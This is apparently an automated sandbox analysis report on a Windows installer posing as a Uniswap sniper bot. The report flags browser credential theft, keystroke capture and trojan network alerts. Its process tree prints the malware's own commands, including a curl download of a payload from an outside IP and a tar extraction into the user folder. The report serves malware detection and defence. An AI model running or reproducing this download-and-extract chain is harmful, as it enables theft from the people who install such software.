Edit tour
Windows
Analysis Report
uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- uniswap-sniper-bot-with-gui Setup 1.0.0.exe (PID: 6584 cmdline:
"C:\Users\ user\Deskt op\uniswap -sniper-bo t-with-gui Setup 1.0 .0.exe" MD5: 48C179680E0B37D0262F7A402860B2A7) - cmd.exe (PID: 5776 cmdline:
"C:\Window s\system32 \cmd.exe" /c tasklis t /FI "USE RNAME eq % USERNAME%" /FI "IMAG ENAME eq u niswap-sni per-bot-wi th-gui.exe " /FO csv | "C:\Wind ows\system 32\find.ex e" "uniswa p-sniper-b ot-with-gu i.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 2536 cmdline:
tasklist / FI "USERNA ME eq user " /FI "IMA GENAME eq uniswap-sn iper-bot-w ith-gui.ex e" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1) - find.exe (PID: 4504 cmdline:
"C:\Window s\system32 \find.exe" "uniswap- sniper-bot -with-gui. exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
- uniswap-sniper-bot-with-gui.exe (PID: 7036 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - cmd.exe (PID: 348 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "cu rl -Lo "C: \Users\use r\AppData\ Local\Temp \p.zi" "ht tp://86.10 4.74.51:12 24/pdown"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6412 cmdline:
curl -Lo " C:\Users\u ser\AppDat a\Local\Te mp\p.zi" " http://86. 104.74.51: 1224/pdown " MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - uniswap-sniper-bot-with-gui.exe (PID: 6480 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- user-data- dir="C:\Us ers\user\A ppData\Roa ming\unisw ap-sniper- bot-with-g ui" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=16 84 --field -trial-han dle=1868,i ,202151390 4842527693 ,103987202 7777672847 8,131072 - -disable-f eatures=Sp areRendere rForSitePe rProcess,W inRetrieve Suggestion sOnlyOnDem and /prefe tch:2 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - explorer.exe (PID: 2580 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - uniswap-sniper-bot-with-gui.exe (PID: 1712 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=util ity --util ity-sub-ty pe=network .mojom.Net workServic e --lang=e n-GB --ser vice-sandb ox-type=no ne --user- data-dir=" C:\Users\u ser\AppDat a\Roaming\ uniswap-sn iper-bot-w ith-gui" - -mojo-plat form-chann el-handle= 2052 --fie ld-trial-h andle=1868 ,i,2021513 9048425276 93,1039872 0277776728 478,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:8 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - uniswap-sniper-bot-with-gui.exe (PID: 4900 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=rend erer --use r-data-dir ="C:\Users \user\AppD ata\Roamin g\uniswap- sniper-bot -with-gui" --app-pat h="C:\User s\user\App Data\Local \Programs\ uniswap-sn iper-bot-w ith-gui\re sources\ap p.asar" -- no-sandbox --no-zygo te --lang= en-GB --de vice-scale -factor=1 --num-rast er-threads =2 --enabl e-main-fra me-before- activation --rendere r-client-i d=4 --laun ch-time-ti cks=635792 0942 --moj o-platform -channel-h andle=2376 --field-t rial-handl e=1868,i,2 0215139048 42527693,1 0398720277 776728478, 131072 --d isable-fea tures=Spar eRendererF orSitePerP rocess,Win RetrieveSu ggestionsO nlyOnDeman d /prefetc h:1 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF) - cmd.exe (PID: 7716 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta r -xf C:\U sers\user\ AppData\Lo cal\Temp\p 2.zip -C C :\Users\us er" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7724 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tar.exe (PID: 7764 cmdline:
tar -xf C: \Users\use r\AppData\ Local\Temp \p2.zip -C C:\Users\ user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)
- cleanup
⊘No configs have been found
⊘No yara matches
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-25T18:54:00.731104+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
2024-11-25T18:54:02.561716+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
2024-11-25T18:54:39.261066+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
2024-11-25T18:54:41.144037+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
Click to jump to signature section
Show All Signature Results
Source: | Static PE information: |
Source: | Registry value created: | Jump to behavior |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |